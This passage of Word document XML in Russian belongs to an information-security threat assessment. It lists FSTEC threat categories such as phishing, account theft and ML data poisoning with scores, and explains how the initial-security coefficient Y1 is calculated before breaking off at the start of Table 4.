          <w:p w14:paraId="272C1CB0"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«форсированного веб-браузинга»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6255628E"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="29F5E179" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="820"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63AA97D2"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УБИ.167</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="228F37C5"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заражения при посещении неблагонадёжных сайтов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B5B55C2"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="293ED317" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="553"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58D7AB4F"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УБИ.168</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D3D30F"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«кражи» учётной записи</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D54CCBA"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="00A3B3FC" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="526"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A34D2D3"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УБИ.175</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0788CEB5"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«фишинга»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="266EB85E"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="5999FBE9" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="956"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="233C891D"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УБИ.186</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6464EAB6"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внедрения вредоносного кода через рекламу, сервисы, контент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E8D30E8" w14:textId="7777777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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="1E344931" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="1245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6713C383" w14:textId="254E13FB"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УБИ.221</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C406DED" w14:textId="35F8C1A5"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eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B343A9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Угроза модификации модели машинного обучения путем искажения («отравления») обучающих данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EC6082B" w14:textId="106FE5D7" w:rsidR="00B343A9" w:rsidRPr="00B343A9" w:rsidRDefault="00B343A9" w:rsidP="00B343A9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="cente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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02C01A8F" w14:textId="77777777" w:rsidR="00B343A9" w:rsidRPr="00B343A9" w:rsidRDefault="00B343A9" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038B6A89" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00392835">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Методика определения вероятности наступления угрозы, утверждённая ФСТЭК 14.02.2008, предписывает определять коэффициент исходной защищённости Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00B343A9">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00392835">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для каждой группы угроз. Этот коэффициент отражает базовый уровень устойчивости системы к потенциальным атакам и позволяет корректно учитывать влияние существующих мер защиты при расчёте актуальности угроз.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076A0D77" w14:textId="5271AB6D" w:rsidR="00B343A9" w:rsidRPr="00ED2018" w:rsidRDefault="0088347F" w:rsidP="00ED2018">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088347F">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Коэффициент исходной защищённости определяется на основе анализа технических и организационных характеристик информационной системы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088347F">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>территориального размещения, наличия подключения к сетям общего пользования, режима разграничения доступа, использования средств криптографической защиты и ряда других параметров. Каждому параметру присваивается уровень защищённости — высокий, средний или низкий, — после чего на основании их совокупности определяется итоговое значение Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00B343A9">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0088347F">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00ED2018" w:rsidRPr="00ED2018">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Расчет коэффициента исходной защищенности показан в таблице 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281959E3" w14:textId="77777777" w:rsidR="00ED2018" w:rsidRPr="00DD2F4C" w:rsidRDefault="00ED2018" w:rsidP="00ED2018">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C21922" w14:textId="5814F99F" w:rsidR="008E0171" w:rsidRPr="00DD2F4C" w:rsidRDefault="008E0171" w:rsidP="002E66B7">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица 4 – </w:t>
      </w:r>
      <w:r w:rsidRPr="00F43632">
        <w:rPr>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Оценка исходного уровня защищённости сети</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9997" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4659"/>
        <w:gridCol w:w="1710"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1705"/>
        <w:gridCol w:w="222"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w14:paraId="5E40DBB8" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="222" w:type="dxa"/>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4659" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E4ADE82"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Критерий защищённости</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5116" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6946DAB2"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Уровень защищенности</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w14:paraId="31551E50" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="225"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4659" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="793A01C0" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="0F1115"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5116" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41620FC5" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="0F1115"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="222" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A03DD7E"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w14:paraId="1738CD71" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="105"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4659" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2978C05A" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="0F1115"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5116" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1877F5A5" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="0F1115"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="222" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D177037" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w14:paraId="727407E4" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="60"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4659" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="792E2B42" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="0F1115"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5116" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B3E808E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="0F1115"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="222" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27D6B1E9" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w14:paraId="0FAB1853" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="183"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4659" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="685FA445" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00AF2AF5" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
